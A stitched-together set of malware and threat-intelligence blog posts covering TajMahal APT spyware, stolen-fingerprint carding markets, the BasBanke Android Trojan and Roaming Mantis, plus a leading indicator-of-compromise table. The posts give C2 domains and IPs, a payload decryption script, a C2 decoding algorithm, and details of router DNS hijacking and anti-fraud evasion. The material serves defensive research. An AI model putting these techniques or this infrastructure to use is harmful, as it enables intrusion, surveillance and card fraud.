Explanation: Document that looks as if it comes from the UAE MOFA discussing a political meeting between GCC countries and the EU in Belgium dw.downloadtesting.com ( 10dfa690662b9c6db805b95500fc753d Sept 2018 محضر اجتماع على الهاتف بين رئيس المكتب السياسي لحركة حماس اسماعيل هنية ورئيس المخابرات المصرية.exe Translation: Minutes of a phone call between the head of the political bureau of Hamas Ismail Haniya and the head of Egyptian intelligence Upload.cat (download site) 6b5946e326488a8c8da3aaec2cb6e70f Sept 2018 Explanation: Document discusses a radio talk by Khalid ‘Abd al-Majid, head of a breakaway faction of the Palestinian Popular Struggle Front, a minor left-wing group within the Palestinian Liberation Organization. He talks about an agreement between al-Nusra and ISIS militants to leave the Palestinian Yarmouk camp in Syria. Wiknet.wikaba.com (
Wiknet.mooo.com 342a4d93df060289b2d8362461875905 Oct 2018 تسريب من داخل القنصلية السعودية حول مقتل جمال خاشقجي.exe Translation: Leak from the Saudi consulate on the death of Jamal Khashoggi Time-loss.dns05.com ( c9cae9026ee2034626e4a43cfdd8b192 Jan 2019 محضر اجتماع السفير القطري العمادي مع الوفد المصري في رام الله .exe Translation: Minutes of meeting of Qatari Ambassador Emadi with the Egyptian delegation in Ramallah Time-loss.dns05.com (
dji-msi.2waky.com Appendix II – Indicators of compromise Type IoC Description RAR md5 E686FFA90B2BFB567547F1C0DAD1AE0B Stage 1 executable / lure RAR md5 CE5AA4956D4D0D66BED361DDD7DB1A3B Stage 1 executable / lure RAR md5 4F34902C9F458008BAE26BFA5C1C00DA Stage 1 executable / lure RAR md5 535F8EA65969A84A68CEAF88778C6176 Stage 1 executable / lure RAR md5 E8A29C7A6F6C0140152CA8A01E336B37 Stage 1 executable / lure RAR md5 E782610BF209E81ECC42CA94B9388580 Stage 1 executable / lure RAR md5 F9BCC21FBB40247167C8C85ED6EF56E3 Stage 1 executable / lure EXE md5 33369AFD3042326E964139CABA1888D3 Stage 2 executable (19182-exe) that invokes Pastebin chain EXE md5 2AD88AE20D8F4CB2C74CAE890FEB337A Stage 2 executable (1918-exe) that invokes Pastebin chain EXE md5 55929FF3E67D79F9E1E205EBD38BC494 Stage 2 executable (21918-exe) that invokes Pastebin chain EXE md5 DA486DF0D8E03A220808C3BFA5B40D06 Stage 2 executable (Adope-exe) that invokes Pastebin chain EXE md5 C7F98F890B21C556D16BFF55E33C33AB Stage 2 executable (Application-exe) that invokes Pastebin chain EXE md5 FAFCC11AF99ACF1B70997BC4BF36CFC0 Stage 2 executable (bind-exe) which is a backdoored Tile Slide Puzzle computer game that invokes Pastebin chain – code freely available EXE md5 28CACBF64141F50426830B385AB1BE4C Dell-cmd – Command string to Delete User Temp directory EXE md5 F30C00E87C7EE27033DC0AC421F3B4F8 Stage 2 executable (D-exe) that invokes Pastebin chain EXE md5 51A59AEC24B5046EC4615728A5B52802 Stage 2 executable (Dv-exe) that invokes Pastebin chain EXE md5 98BDE191AE6E2F7D8D4166C4B21A27D2 Office-vbs – github.gist lolpoke/system1 EXE md5 9E152A6ADCB57D44284AF3B6FD0C94C2 Stage 2 executable (p0w-exe) that invokes Pastebin chain EXE md5 CAB62BB5F00FE15683C6AF760C8E8F7E wPic4-exe – RAT executable similar to Pictures4.exe EXE md5 192DD65864119017AA307BE3363E31BB Powe1-exe – executable that uses scheduled tasks to execute VB scripts EXE md5 71E462260F45C5E621A5F5C9A5724844 WinPeggy4-exe – backdoored Peggy Bees computer game – source code available on Microsoft site EXE md5 AB98768D2440E72F42FCD274806F8D2A WinPeggy-exe – another variant of WinPeggy4.exe EXE md5 DAACE673B1F4DFE8A4D3D021C5190483 Word-hta – VBS code to invoke PowerShell from github.gist..0lol0/system1.ps1 EXE md5 1529AE427FE4EB2D9B4C3073B2AA9E10 Word-vbs – VBS code to invoke PowerShell from github.gist lolpoke/system1.ps1 Powershell md5 CCD324DF0F606469FCA3D1C6FFA951AD System1.ps1 – PowerShell script that invoke a binary in memory that uses NETSH commands to allow programs, then execute a Trojan downloaded from myftp[.]biz Powershell md5 D153FF52AE717D8CF26BEF57BDB7867D Install.ps1 – PowerShell script that invoke a cobalt strike beacon EXE md5 AD1C91BF5E7D1F0AAF2E4EFB8FB79ADE Stage 2 executable (res-vbs) that invokes Pastebin chain EXE md5 EE3AD5B06DBC6CCA7FDC9096697A9B4A Re-vbs – VBS script that uses Pastebin data to create scheduled task and run JScript to invoke RAT EXE md5 805CA34E94DA9615C13D8AF48307FB07 Folder.exe – another RAT variant based on Pastebin chain EXE md5 F330703C07DDD19226A48DEBA4E8AA08 Stage 2 executable (shell-exe) that invokes Pastebin chain EXE md5 CFD2178185C40C9E30AADA7E3F667D4B Another RAT variant based on Pastebin chain EXE md5 C2EE081EC3ADEF4AFACAB1F326EE50FF 2poker2.exe – use PowerShell command to invoke base64 string from Pastebin and create another RAT variant EXE md5 B3A472F81F800B32FE6595F44C9BF63B Stage 1 executable / lure EXE md5 DF3F3AD279CA98F947214FFB3C91C514 Stage 1 executable / lure EXE md5 221EEF8511169C0496BBC79F96E84A4A Stage 1 executable / lure EXE md5 62DF4BC3738BE5AD4892200A1DC6B59A Stage 1 executable / lure EXE md5 55D33D9DA371FDFE7871F2479621444A Stage 1 executable / lure EXE md5 838696872F924D28B08AAAA67388202E Stage 1 executable / lure EXE md5 E8BE9843C372D280A506AC260567BF91 Stage 1 executable / lure EXE md5 55D33D9DA371FDFE7871F2479621444A Stage 1 executable / lure EXE md5 D9DBB65A42FFE0575F0E99F7498A593E Stage 1 executable / lure EXE md5 5DB18AB35D29D44DDA109F49D1B99F38 Stage 1 executable / lure EXE md5 DAE24E4D1DFCDD98F63F7DE861D95182 Stage 1 executable / lure EXE md5 2358DBB85A29167FA66EE6BF1A7271CD Stage 1 executable / lure EXE md5 10DFA690662B9C6DB805B95500FC753D Stage 1 executable / lure EXE md5 6B5946E326488A8C8DA3AAEC2CB6E70F Stage 1 executable / lure EXE md5 342A4D93DF060289B2D8362461875905 Stage 1 executable / lure EXE md5 C9CAE9026EE2034626E4A43CFDD8B192 Stage 1 executable / lure Network dji-msi.2waky.com External C2 domain; rotates with the others over time Network checktest.www1.biz External C2 domain; rotates with the others over time Network fulltest.yourtrap.com External C2 domain; rotates with the others over time Network microsoft10.compress.to External C2 domain; rotates with the others over time Network mmh.ns02.us External C2 domain; rotates with the others over time Network ramliktest.mynetav.org External C2 domain; rotates with the others over time Network testhoward.mysecondarydns.com External C2 domain; rotates with the others over time Network testmace.compress.to External C2 domain; rotates with the others over time Network time-loss.dns05.com External C2 domain; rotates with the others over time Network wiknet.mooo.com External C2 domain; rotates with the others over time Network Wiknet.wikaba.com External C2 domain; rotates with the others over time Network supports.mefound.com External C2 domain; rotates with the others over time Network saso10.myftp.biz External C2 server used by PowerShell scripts to download malware Network External C2 server (most active) Network External C2 server (least active) Network External C2 server (least active) Network External C2 server (least active)

Project TajMahal – a sophisticated new APT framework

10 Duben, 2019 - 05:10

Executive summary

‘TajMahal’ is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named ‘Tokyo’ and ‘Yokohama’. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim’s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins we’ve ever seen for an APT toolset.

Just to highlight its capabilities, TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue. It can also request to steal a particular file from a previously seen USB stick; next time the USB is connected to the computer, the file will be stolen.

TajMahal has been developed and used for at least the past five years. The first known ‘legit’ sample timestamp is from August 2013, and the last one is from April 2018. The first confirmed date when TajMahal samples were seen on a victim’s machine is August 2014.

More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky.com).

Technical details

We have discovered two different types of TajMahal packages, self-named Tokyo and Yokohama. The targeted systems found by Kaspersky Lab were infected with both packages. This suggests that Tokyo was used as first stage infection, deploying the fully-functional Yokohama package on interesting victims, and then left in for backup purposes. The packages share the same code base, we identified the following interesting features:

  • Capable of stealing documents sent to the printer queue.
  • Data gathered for victim recon includes the backup list for Apple mobile devices.
  • Takes screenshots when recording VoiceIP app audio.
  • Steals written CD images.
  • Capable of stealing files previously seen on removable drives once they are available again.
  • Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies.
  • If deleted from Frontend file or related registry values, it will reappear after reboot with a new name and startup type.

So far we have detected a single victim based on our telemetry – a diplomatic entity from a country in Central Asia.


The TajMahal framework is an intriguing discovery that’s of great interest, not least for its high level of technical sophistication, which is beyond any doubt. The huge amount of plugins that implement a number of features is something we have never before seen in any other APT activity. For example, it has its own indexer, emergency C2s, is capable of stealing specific files from external drives when they become available again, etc.

The question is, why go to all that trouble for just one victim? A likely hypothesis is that there are other victims we haven’t found yet. This theory is reinforced by the fact that we couldn’t see how one of the files in the VFS was used by the malware, opening the door to the possibility of additional versions of the malware that have yet to be detected.

Kaspersky Lab products detect the TajMahal APT samples as HEUR:Trojan.Multi.Chaperone.gen

Appendix I – Indicators of compromise

A full set of IOCs and Yara rules is available to customers of Kaspersky Intelligence Reporting service – contact intelreports@kaspersky.com

Domains and IPs

File Hashes

Appendix II – Additional technical details

The following table provides the full list of files stored in the VFS with a short description describing what the plugins do:

nn Name Short description 00
01 cs64.dll
cs32.dll C2 communication and command processing. WatchPoints document stealer. 02
03 li64.dll
li32.dll LocalInfo. Collects a large amount of information, titled “TAJ MAHAL” 04
06 ad64.dll
ad32.dll AudioRecorder. Microphone, Voice IP applications. 07
08 le64.dll
le32.dll Open source-based LAME mp3 encoder (“Mar 27 2014”) used by AudioRecorder plugins (adXX.dll). 09 dd.m MP3 file is sent by AudioRecorder (adXX.dll) when cache is cleared. 10
11 me64.dll
me32.dll AudioRecorder for Windows Metro applications.
Injects ma32.dll into “wwahost.exe” or “audacity.exe”. 12 ma32.dll AudioRecorder for Windows COM.
Hooks IAudioClient, IAudioRenderClient, IMMDevice. 13
14 ams_api64.dll
ams_api32.dll Handy wrapper around API of exXX.dll, pdXX.dll, sgXX.dll. 15
16 ex64.dll
ex32.dll Orchestrator. Update/install/uninstall, selects target processes and loads plugins. 17
18 fe64.dll
fe32.dll Template of “Yokohama” Frontend module; is used for reinstalling. 19
20 pd64.dll
pd32.dll Provides API to access configuration settings, working files, egress queue. 21
22 libpng64.dll
libpng32.dll Open source “libpng” library version 1.5.8 (February 1, 2012). Used by Screenshoter plugin (ssXX.dll). 23
24 rs64.dll
rs32.dll Reinstaller/Injector. 25
26 ix32.dll
ix64.dll LoadLibrary call template dll is used by Reinstaller/Injector plugin (rsXX.dll) for injecting LoadLibrary call into running processes. 05
28 obj32.bin
obj64.bin Shellcode template is used by Reinstaller/Injector (rsXX.dll) and AudioRecorder4MetroApp (meXX.dll) for injecting into running processes. Both versions of “obj32.bin” are the same; it seems to be stored twice by mistake. 29
30 sc64.dll
sc32.dll Utility library. Provides API for cryptography, file, registry, memory management operations and so on. 31
32 sg64.dll
sg32.dll Library for managing egress queue (files and messages prepared to send to CC). 33
34 st64.dll
st32.dll SuicideWatcher. Watches uninstall time, checks time diff (local time vs internet time). 35
36 zip64.dll
zip32.dll Open source “XZip/XUnzip” library by Info-Zip + Lucian Wischik + Hans Dietrich. Is used by Indexer (inXX.dll) and C2 communication (csXX.dll) plugins. 37
38 zlib64.dll
zlib32.dll Open source “zlib” version 1.2.3 used by libpngXX.dll for compressing screenshots (ssXX.dll). 39 il32.dll IM-Stealer. Steals conversation content from chat windows of instant messaging applications. 40
55 in32.dll
in64.dll Indexer. Indexes files on victim drives, user profiles, removable drives.
Built index files are zipped (by zipXX.dll) and put in send queue. 41
56 isys9core_64.dll
isys9_64.dll Proprietary “ISYS Search Software” components are used by Indexer plugin.
Licensee_ID1 “Q5GXU H5W67 23B4W SCQFD 4G7HV 9GSLW”
Licensee_ID2 “objectviewer.exe” 45
54 sqlite3_64.dll
sqlite3_32.dll Open source “sqlite” library. Used by “ISYS Search”. 57
58 tn32.dll
tn64.dll Thumbnailer. Makes and prepares to send thumbnails of found picture files. 59
62 freeimage_32.dll
freeimageplus_64.dll FreeImage open source library supports popular graphics image formats (ver 3.15.4 2012-10-27) (http://freeimage.sourceforge.net). Is used by Thumbnailer (tnXX.dll) plugin. 63
64 ku64.dll
ku32.dll Keylogger & clipboard monitor. 65
66 pm64.dll
pm32.dll Steals printed documents from spooler queue.
This is done by enabling the “KeepPrintedJobs” attribute for each configured printer stored in Windows Registry:
key: “SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\Printers”
value: “Attributes” 67
68 rc64.dll
rc32.dll EgressSender. Sends files from output queue to C2. 69
70 rn64.dll
rn32.dll Daily “ClientRecon” (ComputerName, OS information, MacAddress, WirelessNetwork keys, connected Apple devices, Apple mobile devices backups list, IE version, SecurityCenterInfo (AV, Firewalls and AntiSpyware products), Hardware info, Installed soft including Metro Apps, Users, Autoruns).
Check and send to C2 if something changed. 71
72 ss64.dll
ss32.dll Screenshoter. Periodic low resolution screenshots. High resolution screenshots of specified process windows and when recording VoiceIP application audio. See “ss_pr” & “ss_wt_nm” cfg vars. 73
74 vm32.dll
vm64.dll Steal documents from fixed and removable drives. Watch CDBurnArea and steals written CD images. 75
76 wc64.dll
wc32.dll Periodically makes webcamera snapshots. 77 default.cfg Default configuration settings file. 78 runin.bin List of processes names and associated plugins should be run inside these processes. 79 morph.dat Configuration file stores path of work folders and registry keys.

Digital Doppelgangers

9 Duben, 2019 - 09:25

Carding exists for over 20 years. And it is not dead yet. It is alive, and even more – it is being actively developed by cybercriminals. The “good” old method of entering stolen credit card information into online store forms to buy goods and services or using online payment system accounts for the same purpose still works like a charm. Of course, the process has become more sophisticated, and it is certainly not so easy to do as it used to be 10 years ago, but unfortunately it is still possible.

The modern financial cyberfrauds, sophisticated targeted attacks on banks like Carbanak and Silence, hundreds of families of banking Trojans, etc. It had all started with carding forums many years ago. Carding is the cradle of modern financial cybercrime. As before, bank cards, payment systems and online banking frauds are the most valuable criminal sources of wealth.

A study by Juniper Research estimates that losses from online payment frauds will reach 43 billion USD by 2023, up from 22 billion USD in 2018, making anti-fraud and cybersecurity measures a top concern for the industry. And this is not surprising – every day cybercriminals develop new methods and tools to bypass anti-fraud protection systems, they develop malware to help them in their activities, create services and stores, discuss ways to defeat protection mechanisms on Darknet forums and channels. From the famous Cardingplanet forum to Darknet stolen card stores – financial cybercrime schemes were not dead at all during all these years. They have evolved and become more dangerous than ever.

Digital fingerprint protection

How do modern anti-fraud systems protect users from online fraud? They employ various models and combinations of multiple technical and analytical methods. But in simple terms, any anti-fraud system must identify a fraudster and block his attempt to accomplish an illegal transaction involving a bank card or payment system account. To identify fraudsters and separate them from legitimate buyers the anti-fraud system uses various mechanisms designed to verify the user’s digital identity mask, and if it knows this mask to be legitimate or the mask is a new and unique one, it will not throw the “red flag”. As a result, the user behind the mask is recognized to be a legitimate one, and his query, such as an attempt to make a purchase using the provided bank card details, will be approved. If the user’s digital identity appears suspicious, the transaction will be canceled or put on hold for an additional manual check. Additional authentication typically includes a request to provide extended information like bank card expiry date or CVV number, or possibly also a verification call from the online store or payment system operator for voice verification.

As such, the user’s digital identity is a digital fingerprint – a combination of system attributes that are unique to each device and personal behavioral attributes of the user himself. The first part, the device fingerprint, includes:

  • IP address (external and local)
  • Screen information (screen resolution, window size)
  • Firmware version
  • Operating system version
  • Browser plugins installed
  • Timezone
  • Device ID
  • Battery information
  • Audio system fingerprint
  • GPU info
  • WebRTC IPs
  • TCP/IP fingerprint
  • Passive SSL/TLS analysis
  • Cookies
  • and many more

The device may have over 100 attributes used for browsing.

The second part of the digital identity is the behavioral analysis. Modern anti-fraud solutions analyze the user’s social network accounts (third-party cookies check) and various aspects of his/her behavior, including:

  • Time spent at online store website
  • Clicks on website location
  • Interest-related behavior (items of interest, typical amount of money spent, digital or real merchandise, etc.)
  • Mouse/touchscreen behavior
  • System configuration changes

The anti-fraud system may “red flag” various tricks, but the main idea is to make sure that the user’s collected digital identity had been used for transactions before, such transactions had been legitimate, or that the digital fingerprint is completely unique and used for the first time. This is why, if a cybercriminal uses the same machine for multiple attempts to buy from the same online shore using different bank cards details or stolen payment system login/password pairs, such illegal transactions will be declined. Anti-fraud systems can check the user’s collected fingerprint against the local database of fraudster device fingerprint patterns and, if any of them should match the one being used for the online purchase attempt, the transaction will be immediately blocked.

Fingerprint example

But the bad guys are always looking for ways to defeat the anti-fraud safeguards. They do in-depth research work to find out how anti-fraud systems work, they analyze browser traffic using different local analysis proxy tools to understand protection system scripts and queries. They study the information gathered from devices to create unique digital fingerprints of its users.

The next thing they do is try to substitute the system’s real fingerprint with the fake one. They try to manipulate queries and supply unique values in response to every query from the anti-fraud mechanism. Or, as a more advanced alternative, they substitute the requested values with the already existing ones – stolen from someone else’s PC.

Genesis Store

Cybercriminals soon became aware that unique fingerprints from users’ PCs make valuable information useful to many of their own kind. They began devising malware to steal fingerprints from users’ machines and selling such fingerprints along with other stolen data from the same machines, including user accounts, logins, passwords and browser cookies collected from various online services – from stores and payment systems to bank accounts. With our cybercrime threat intelligence technologies we were able to identify and analyze the biggest marketplace for this kind of data – the Genesis Store.

Genesis Store is an online cybercriminal invitation-based private market for stolen digital fingerprints. At the moment it offers more than 60k+ stolen bot profiles. The profiles include: browser fingerprints, website user logins and passwords, cookies, credit card information. The price varies from 5 to 200 dollars per profile – it heavily depends on the value of the stolen information. For example, if the bot has a login/password pair from an online bank account, the price is higher. As the marketplace owners have explained in their Darknet forum thread, the price is calculated automatically using a unique algorithm.

Genesis Store homepage

Bots for sale

Genesis Store has a configurable search panel that allows searching for specific bots. Logins and passwords from a particular website, the victim’s country, operating system, date the profile first appeared at the market – everything is searchable.

Genesis search panel

Genesis Store owners want to make the use of stolen profiles as easy as possible, so they have developed a special .crx plugin for Chromium-based browsers. The plugin allows installing stolen digital profiles into the cybercriminal’s own browser with a single mouse click for him to become a doppelganger of the victim. After that the bad guy only needs to connect to a proxy server with an IP address from the victim’s location and he can bypass the anti-fraud systems’ verification mechanisms, pretending to be a legitimate user.

Genesis plugin

Fingerprint settings in Genesis plugin

For the customers who don’t want to buy real fingerprints, there is also an option to generate unique ones. Genesis Store gives its customers an opportunity to use Genesis algorithms and the plugin to generate random fingerprints that can be used, for example, to enter stolen bank card information into online store forms: such unique browser fingerprints will be properly configured, so the anti-fraud system will not be alarmed.

Genesis fingerprint generator

The dark sphere

Another tool widely used to bypass anti-fraud systems is the Tenebris Linken Sphere browser. Its developers position it as the perfect browser for anonymity, and in fact it has been used for carding for years. Unlike the Genesis plugin, Sphere is a fully functional browser with advanced fingerprint configuration capabilities, automatic proxy server validity testing and usage options, etc. It even features a user activity emulator – cybercriminals can program it to open the desired websites, follow links, stay on websites for a given length of time, etc. Simply put, to trick the anti-fraud systems’ behavior analysis modules. The Tenebris Linken Sphere developers have also created a marketplace of unique fingerprints that can be used with Sphere browsers.

Tenebris website

Unlike Genesis, Sphere uses a subscription-based licensing system. One month’s worth of the browser usage costs 100$. With the fingerprints market access thrown in, the price is 500$ per month.

Tenebris Sphere licenses

Sphere has much deeper fingerprint configuration options for generated fingerprints. Most of the parameters are fully adjustable for an opportunity to create exactly the fingerprint one needs to mimic a real user.

Configuration panel

Configuration panel



Antifraud systems are rapidly developing. They introduce new protection mechanisms to fend off fraudsters, while fraudsters develops new tools to break through the protection layers. The sums of money lost to carding attacks are huge, and cybercriminals are most certain to scale up these malicious activities.

The security departments of financial organizations must always look for ways to counter such threats. Extra two-factor authentication for any transaction initiated using a bank card or payment system is an absolute necessity these days, even if the user’s digital profile appears legit to the protection system. Even though it is not very convenient for users to complete the extra authentication routine each time they want to buy online, it is the most effective safeguard against carding attacks for the present.

In addition, new user behavior analysis methods must be developed and implemented together with custom fingerprinting technologies that may include hardware-based fingerprint collection arrangements operating on a deeper level than currently available. Additional biometric authentication should be considered as well.

Kaspersky Lab continuously researches financial cybercrime to provide timely protection against the hostile activities.

BasBanke: Trend-setting Brazilian banking Trojan

4 Duben, 2019 - 13:00

BasBanke is a new Android malware family targeting Brazilian users. It is a banking Trojan built to steal financial data such as credentials and credit/debit card numbers, but not limited to this functionality. The propagation of this threat began during the 2018 Brazilian elections, registering over 10,000 installations to April 2019 from the official Google Play Store alone.

This malware can perform tasks such as keystroke logging, screen recording, SMS interception, and the theft of credit card and financial information. To trick users into downloading the malware, the authors advertise it via Facebook and WhatsApp messages. Campaign’s new URLs redirect victims either to the official Google Play Store or to a website hosting malicious APK packages.

Malicious applications used to distribute BasBanke, hosted in the Google Play Store.

The malicious applications hosted in Google Play Store disguise themselves as applications with supposed functionality such as a secure QR reader, a fake app for a real travel agency with travel deals, and – implementing a well-known trick – as an application to “see who visited your profile.” The most widespread malicious application is a fake version of CleanDroid, first announced in a paid advertisement on Facebook, and linking to the application hosted on the Play Store. This “miraculous” application promises to protect the victim’s device against viruses, to optimize memory space, and to save data when using a 3G or 4G connection. In reality it is a banking Trojan.

The malicious CleanDroid application shown in a Facebook advertisement. Source: Defesa Digital

The number of targeted banking applications and websites is quite significant. A considerable number of Brazilian financial institutions and other popular websites such as Spotify, YouTube, and Netflix are on the target list. However, when it comes to stealing banking credentials, metadata such as the device name, IMEI, and the telephone number used by the victim are sent to a remote C2. Why pay special attention to this data? Well, fraudsters need it to mimic legitimate access to the account of the victim.

Metadata extracted from the phone and sent to the remote C2.

Depending on the version of the malware, we found different targets – and they are all financial institutions. In addition, an extensive list of keywords defines what other brands or websites will trigger the keylogging procedure.

We have previously found a few malicious campaigns similar to this but with significantly reduced distribution when compared to BasBanke. Another difference is that BasBanke uses Facebook and WhatsApp as a mass distribution vector. Also, it appears to have sparked new ideas among Brazilian cybercriminal crews, by showing how easy it is to infect an Android device with a malicious application hosted in the official store. The attackers behind BasBanke have proved that the Play Protect feature is not enough to stop them and effectively block their malware. In fact, Basbanke is the forerunner of a larger malicious campaign that we’ll be reporting on soon.

Reference IoC



Interested in more information? Email us at financialintel@kaspersky.com

Roaming Mantis, part IV

3 Duben, 2019 - 18:30

One year has passed since we published the first blogpost about the Roaming Mantis campaign on securelist.com, and this February we detected new activities by the group. This blogpost is follow up on our earlier reporting about the group with updates on their tools and tactics.

Mobile config for Apple phishing

Our key finding is that the actor continues to seek ways to compromise iOS devices and has even built a new landing page for iOS users. When an iPhone user visits this landing page, they sees pop-up messages guiding them to the malicious iOS mobile config installation:

Pop-up messages and mobile config installation

After installation of this mobile config, the phishing site automatically opens in a web browser and collected information from the device is sent to the attacker’s server. This information includes DEVICE_PRODUCT, DEVICE_VERSION, UDID, ICCID, IMEI and MEID.

XML and CA in mobile config

The CA contains the suspected developer’s email address, “zeeyf79797@yahoo.co[.]jp”, which could be malicious.

We created a test account for this research and used the account credentials at the phishing site. As soon as the threat actor received the ID and password, the criminals attempted to log in to the account from Hong Kong. After entering the credentials, we were directed to the next page, which tried to steal the two-factor authentication code (PIN) sent to the device.

Phishing page for stealing apple ID and two-factor authentication

Re-spreading the updated sagawa.apk Type A (MoqHao/XLoader)

On the Android front, our telemetry data shows a new wave of malicious APK files which we detect as “Trojan-Dropper.AndroidOS.Wroba.g”.

sagawa.apk Type A has spread since Feb 26

We have analyzed the malicious APK file and confirmed that it is definitely a variant of sagawa.apk Type A malware, also known as MoqHao (Mcafee) and XLoader (TrendMicro). Type A malware was earlier distributed via SMS in Japan.

We also found out that the threat actors had compromised routers to overwrite DNS settings and discovered that the following two features were updated as well:

  • Decryption algorithm for encrypted payload in Trojan-Dropper module
  • Stored destination and accounts for getting real C2
Decryption algorithm for encrypted payload in Trojan-Dropper module

Compared to the previous version, the Trojan-Dropper’s decryption function has been altered slightly (change highlighted in purple):

Added 4-byte skip from encrypted data in decompiled code

Why did the attackers change it? Well, the simplified Python script for extracting encrypted payload was disclosed in our previous blog posts. We are suspecting that the actor considered this and introduced some minor changes to their decryption algorithm to evade detection by security products and researchers.

However, we have updated the simplified Python script according to this change:

  • sagawa.apk_typeA_payload_extractor_1.01.py
  • #!/usr/bin/env python import sys import zlib import base64 data = open(sys.argv[1],"rb").read() dec_z = zlib.decompress(data[4:]) # open.skip(4); dec_b = base64.b64decode(dec_z) with open(sys.argv[1]+".dec","wb") as fp: fp.write(dec_b) Stored destination and accounts for getting real C2

    In the previous campaign, the three accounts “haoxingfu11”, “haoxingfu22” and “haoxingfu33” on @outlook.com were stored inside the samples for the purpose of retrieving the C2 server address. In order to fetch the C2 server address, the email service was used the real C2 destination was delivered to the victims in an encrypted form from the email subject. In the new version the actor has switched their tactics for retrieving the C2 address from email service to fetching it from Twitter.

    “https://twitter.com/%s” is stored in the malware

    The three suspected Twitter accounts were easily found as well, because the sample had the account IDs stored together, separated by the “|” character just like the old samples:

    Three account IDs separated by the “|” character

    The decryption algorithm for the real C2 address remained untouched – the malware connects to the extracted real C2 via web socket. In addition to the three accounts mentioned earlier, we found several other accounts:

    • lucky88755
    • lucky98745
    • lucky876543
    • gyugyu87418490
    • luckyone1232
    • sadwqewqeqw

    The decryption algorithm for extracting the real C2 from Chinese characters is the same as in the previous sample, so our scripts from the old blogpost will still work. All the accounts are related to the same IP, although the port numbers are different. The table below shows these changes as derived from the account “@luckyone1232”.

    Datetime (UTC) Encrypted data Decrypted real C2 February 25 2019 11:30 傘傠傘偠傈傠偠傠傐傸偘储傀傐僨傀僨僸傸傀 114.43.155[.]227:28855 February 26 2019 08:00 傀傸傸偠傠傠傠偘傘储偘傰傠僠僨傀僨僸傸傀 220.136.47[.]169:28855 March 02 2019 01:00 傀傸傸偠傠傠傠偘傘僘偘傰傈傐僨傀僨僸傸傀 220.136.49[.]137:28855 March 05 2019 06:00 傀傸傸偠傠傠傠偘傠僘偘傰僀傸僸僐傀傐 220.136.39[.]1:28855 March 07 2019 03:00 傘傠僸偠傠傈僐偘傰傈储偈傀傰傈僀傸僸僐傀傐 118.168.130[.]236:28855 March 09 2019 10:00 傠傠偈傀傰傸偠傸傰傐偘储傀僨僨傀僨僸傸傀 61.230.210[.]228:28855 March 13 2019 01:00 傘傸傐偠傸储储偘傰储傈偈傈傀僨傀僨僸傸傀 125.227.174[.]35:28855 March 21 2019 01:00 傘偘傰傠僠偈傀储傠偠傈僸僀傸僸僐傀傐 1.169.203[.]48:28855

    We also noticed that the threat actor has introduced a new backdoor command “getPhoneState”. The following table shows the comparison of the older and newer versions of the malware:

    Date August 08 2018 March 03 2019 MD5 956f32a28d0057805c7234d6a13aa99b 651b6888b3f419fc1aac535921535324 File size 427.3 KB (437556 bytes) 396.0 KB (405504 bytes) Malware type sagawa.apk Type A
    MoqHao (McAfee)
    XLoader (TrendMicro) sagawa.apk Type A
    MoqHao (McAfee)
    XLoader (TrendMicro) Encrypted payload (enc_data) \assets\a \assets\bin Decryption algorithm for payload payload = base64.b64decode(zlib.decompress(enc_data)); payload = base64.b64decode(zlib.decompress(enc_data[4:])); Backdoor commands sendSms
    ping sendSms
    getPhoneState Stored destination @outlook.com (email) https://twitter.com/%s (SNS) Accounts haoxingfu11
    haoxingfu33 luckyone1232
    gyugyu87418490 RegExp abcd <title>abcd([\\u4e00-\\u9fa5]+?) “; Decryption algorithm for real C2 for i in range(len(ext)):
    dec = dec + chr((ord(ext[i]) – 0x4e00) >> 3 ^ ord(‘beg'[j]))
    j = (j+1) %3 for i in range(len(ext)):
    dec = dec + chr((ord(ext[i]) – 0x4e00) >> 3 ^ ord(‘beg'[j]))
    j = (j+1) %3 Rogue DNS settings in compromised routers again

    In late February 2019, we detected a URL query of a malicious DNS changer. Here is an example:

    URL query of malicious DNS changer

    The router’s DNS setting is potentially compromised if the device reads the URL query of the DNS changer from localnet under a router with the following conditions:

    1. No authentication for router panel from localnet
    2. The device has an admin session for the router panel
    3. Simple ID and password (or default) for route panel like admin:admin

    As we have observed, several hundred routers have been compromised and all pointed to the rogue DNS IPs.

    This code overwrites the rogue DNS IPs below into the DNS settings of routers:

    • 171.244.33[.]114
    • 171.244.33[.]116
    Geographical expansion

    According to our detection data, new variants of sagawa.apk Type A (Trojan-Dropper.AndroidOS.Wroba.g) have been detected in the wild, based on our KSN data from February 25, 2019 to March 20, 2019.

    Geographical expansion from KSN data

    The worst affected countries are Russia, Japan, India, Bangladesh, Kazakhstan, Azerbaijan, Iran and Vietnam. Our products detected this malware over 6,800 times for over 950 unique users during this period. We believe this attack wave has a much bigger scale and these numbers reflect only a small part of this campaign.


    We have seen increased distribution of sagawa.apk Type A since late February 2019. This wave is characterized by a new attack method of phishing with malicious mobile config, although the previously observed DNS manipulation is also still actively used. We find the use of malicious mobile config especially alarming as this may cause serious problems for the users. As explained in an earlier blog post, “the profile could configure the device to use a malicious proxy or VPN, effectively allowing the attacker to monitor everything.”

    We recommend users take the following steps:

    • Change the default ID and password, and apply the relevant security patches to counter these threats;
    • For Android users: do not download APKs from third-party sources;
    • For iOS users: do not install a non-trusted third-party mobile config.

    For further information about this threat actor, please refer to our previous blog posts about Roaming mantis:

    Kaspersky Lab products detect this malware for Android as:

    • HEUR:Trojan-Banker.AndroidOS.Wroba
    • HEUR:Trojan-Dropper.AndroidOS.Wroba

    Finally, we would like to show our appreciation to the Japanese researchers @ninoseki and @papa_anniekey, who have shared and discussed with us their results of Roaming Mantis campaign research. The criminals are still rapidly improving their methods: we discovered some updated sagawa.apk Type A this April, the fresh sample has embedded DES algorithm instead of some decryption feature. We’re going to track Roaming Mantis activity and publish any new activities in the future.

